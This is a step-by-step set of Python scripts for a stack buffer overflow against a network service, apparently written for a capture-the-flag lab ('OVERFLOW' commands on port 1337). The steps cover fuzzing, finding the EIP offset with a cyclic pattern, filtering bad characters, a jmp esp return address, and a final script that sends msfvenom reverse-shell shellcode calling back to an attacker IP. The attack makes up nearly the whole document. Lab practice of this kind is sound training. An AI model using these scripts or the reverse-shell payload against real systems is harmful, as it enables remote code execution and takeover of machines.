# BoF Script Python

## 1-fuzzer.py

The idea is to send a growing run of "A" bytes (100 more on each connection) until the service stops responding, which tells you roughly how many bytes it takes to crash it.

```python
import socket, time, sys

ip = "10.10.12.54"
port = 1337
timeout = 5
prefix = "OVERFLOW5 "
string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # banner
            print(f"Fuzzing with {len(string) - len(prefix)} bytes")
            # latin-1 maps every code point 0x00-0xff to the same single byte
            s.sendall(bytes(string, "latin-1"))
            s.recv(1024)  # response; this times out once the service has crashed
    except OSError:  # covers connection refused/reset and socket.timeout
        print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
        sys.exit(0)
    string += "A" * 100
    time.sleep(1)
```

## 2-pattern.py

Replace the payload with a cyclic pattern whose length is the crash size reported by the fuzzer + 200, then read the EIP value from the debugger after the crash to find the offset:

Use this website to generate the pattern --> <https://wiremask.eu/tools/buffer-overflow-pattern-generator/>

```python
import socket, sys

ip = "10.10.12.54"
port = 1337
timeout = 5
prefix = "OVERFLOW5 "
payload = "<PUT PATTERN HERE>"  # cyclic pattern, crash size + 200 bytes long
string = prefix + payload

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # banner
        print(f"Fuzzing with {len(string) - len(prefix)} bytes")
        s.sendall(bytes(string, "latin-1"))
        s.recv(1024)  # response; times out if the service crashed
except OSError:
    print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
    sys.exit(0)
```
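An added example, not part of the original page, showing what the linked generator does: it builds a Metasploit-style cyclic pattern and turns the EIP value shown by the debugger into the offset. The debugger prints EIP as a big-endian number while the bytes were written to the stack little-endian, so the four characters that overwrote EIP are the value's bytes in reverse order. The crash size, pattern length and EIP value below are constructed.

```python
# Added example (not from the original page): cyclic pattern + offset lookup.
from string import ascii_uppercase, ascii_lowercase, digits


def cyclic_pattern(length):
    """Aa0Aa1...Aa9Ab0...: every 4-byte window is unique up to 20280 bytes."""
    out = []
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, eip_hex):
    """eip_hex as shown in the debugger, e.g. '35714234' or '0x35714234'.
    Returns the number of bytes that sit before the 4 that land in EIP."""
    eip_hex = eip_hex.lower()
    if eip_hex.startswith("0x"):
        eip_hex = eip_hex[2:]
    # undo the little-endian store: last byte in memory is the high byte of EIP
    needle = bytes.fromhex(eip_hex)[::-1].decode("latin-1")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value does not come from this pattern")
    if pattern.find(needle, idx + 1) >= 0:
        raise ValueError("EIP value occurs more than once; use a shorter pattern")
    return idx


if __name__ == "__main__":
    # Constructed scenario: fuzzer crashed around 1300 bytes, so a 1500-byte
    # pattern was sent and the debugger then reported EIP = 35714234.
    p = cyclic_pattern(1500)
    print(pattern_offset(p, "35714234"))  # 1274
```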

## 3-checkEIP.py

Optional: confirm that you control EIP by placing "BBBB" right after `offset` bytes of padding; the debugger should show EIP = 42424242 after the crash.

```python
import socket, sys

ip = "10.10.192.42"
port = 1337
timeout = 5
prefix = "OVERFLOW3 "
offset = 1274  # from the pattern step
string = prefix + "A" * offset + "BBBB"  # "BBBB" should land in EIP (0x42424242)

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # banner
        print(f"Fuzzing with {len(string) - len(prefix)} bytes")
        s.sendall(bytes(string, "latin-1"))
        s.recv(1024)  # response; times out if the service crashed
except OSError:
    print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
    sys.exit(0)
```

## 4-sendBadChar.py

Replace the payload with the bytes 0x01 to 0xff in order and, in the debugger, check which of them arrive in memory changed or missing: those are the bad characters for this service. \
Generate the bad-character string with this Python script --> <https://github.com/joshua17sc/Buffer-Overflows/blob/main/create.py>

```python
import socket, sys

ip = "10.10.12.54"
port = 1337
timeout = 5
prefix = "OVERFLOW5 "
payload = "<BAD CHAR HERE>"  # "\x01\x02...\xff" minus the bad characters found so far
offset = 314
string = prefix + ("A" * offset) + "BBBB" + payload  # payload sits at ESP after the crash

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # banner
        print(f"Fuzzing with {len(string) - len(prefix)} bytes")
        s.sendall(bytes(string, "latin-1"))
        s.recv(1024)  # response; times out if the service crashed
except OSError:
    print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
    sys.exit(0)
```
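An added example, not part of the original page, of the comparison this step asks for: it takes the byte set create.py prints and a debugger hex dump of ESP (constructed here), and reports only the first byte that differs. A bad character usually corrupts or shifts everything after it, so later mismatches in the same round are not reliable; add the first one to the exclusion list, regenerate, resend and compare again.

```python
# Added example (not from the original page): find the first bad character
# by comparing what was sent with what the debugger shows at ESP.

def all_bytes_except(bad):
    """Same byte set create.py prints: 0x01-0xff minus the known bad ones."""
    return bytes(b for b in range(1, 256) if b not in bad)


def parse_hexdump(text):
    """Turn debugger dump lines ('ADDRESS  01 02 03 ...') into bytes.
    The first column is the address and is skipped."""
    out = bytearray()
    for line in text.strip().splitlines():
        out.extend(int(h, 16) for h in line.split()[1:])
    return bytes(out)


def first_bad_char(sent, dumped):
    """Return (index, sent_byte, seen_byte) for the first difference, or None
    when every sent byte reached memory unchanged. seen_byte is None when the
    dump ends before that index (the service truncated the input)."""
    for i, b in enumerate(sent):
        if i >= len(dumped):
            return i, b, None
        if dumped[i] != b:
            return i, b, dumped[i]
    return None


# Constructed dump (not real debugger output): this service strips 0x0a, so
# 0x0b lands where 0x0a should be and every later byte is shifted by one.
SAMPLE_DUMP = """
0178FA30  01 02 03 04 05 06 07 08 09 0B 0C 0D 0E 0F 10 11
0178FA40  12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21
"""

if __name__ == "__main__":
    result = first_bad_char(all_bytes_except({0x00}), parse_hexdump(SAMPLE_DUMP))
    if result is None:
        print("no bad characters found in this round")
    else:
        idx, want, got = result
        seen = "<end of dump>" if got is None else f"{got:#04x}"
        print(f"first mismatch at offset {idx}: sent {want:#04x}, memory shows {seen}")
```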

## 5-jmp\_esp\_module.py

Replace "BBBB" (the value that lands in EIP) with the address of a `jmp esp` instruction from a loaded module, so that when EIP is loaded execution continues at ESP, where your payload sits.

```python
import socket, sys

ip = "10.10.192.42"
port = 1337
timeout = 5
prefix = "OVERFLOW3 "
# remaining (non-bad) bytes, used here as a placeholder payload at ESP
payload = "\x01\x02\x03\x04\x05\x06\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
module = "<MODULE HERE>"  # jmp esp address, written as 4 bytes in little-endian order
offset = 1274
string = prefix + ("A" * offset) + module + payload

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # banner
        print(f"Fuzzing with {len(string) - len(prefix)} bytes")
        s.sendall(bytes(string, "latin-1"))
        s.recv(1024)  # response; times out if the service crashed
except OSError:
    print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
    sys.exit(0)
```

## 6-revshell.py

Send the payload (the shellcode) to the server.

Generate the shellcode with msfvenom, excluding the bad characters found in step 4:

```bash
# msfvenom script
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1337 EXITFUNC=thread -b "<badchars>" -a x86 -f c -v shellcode

# example
msfvenom -p windows/shell_reverse_tcp LHOST=10.4.1.97 LPORT=11111 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -a x86 -f c -v shellcode
```

```python
import socket, sys

ip = "10.10.172.48"
port = 1337
timeout = 5
prefix = "OVERFLOW4 "

# paste the string literals from msfvenom's output inside the parentheses
# (drop the C declaration line; adjacent "..." literals concatenate in Python too)
payload = ("<SHELLCODE FROM MSFVENOM>")
offset = 2026
padding = "\x90" * 16  # NOP sled in front of the shellcode
module = "\x05\x12\x50\x62"  # jmp esp at 0x62501205, written little-endian
string = prefix + ("A" * offset) + module + padding + payload

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # banner
        print(f"Fuzzing with {len(string) - len(prefix)} bytes")
        s.sendall(bytes(string, "latin-1"))
        s.recv(1024)  # response; times out if the service crashed
except OSError:
    print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
    sys.exit(0)
```

## Create Bad Char

create.py

```python
#!/usr/bin/env python3

# Start with 00 and add any other bad characters you find, separated by spaces
bad = "00".split()

# Turns the remaining bytes into a string you can paste into the Python script
print("badchars = ")
for x in range(1, 256):
    if "{:02x}".format(x) not in bad:
        print("\\x" + "{:02x}".format(x), end='')

# Creates the matching bytearray command for Mona
print("\n\nfor mona")
print("!mona bytearray -b '", end='')
for byte in bad:
    print("\\x{}".format(byte), end='')
print("'")
print()
```

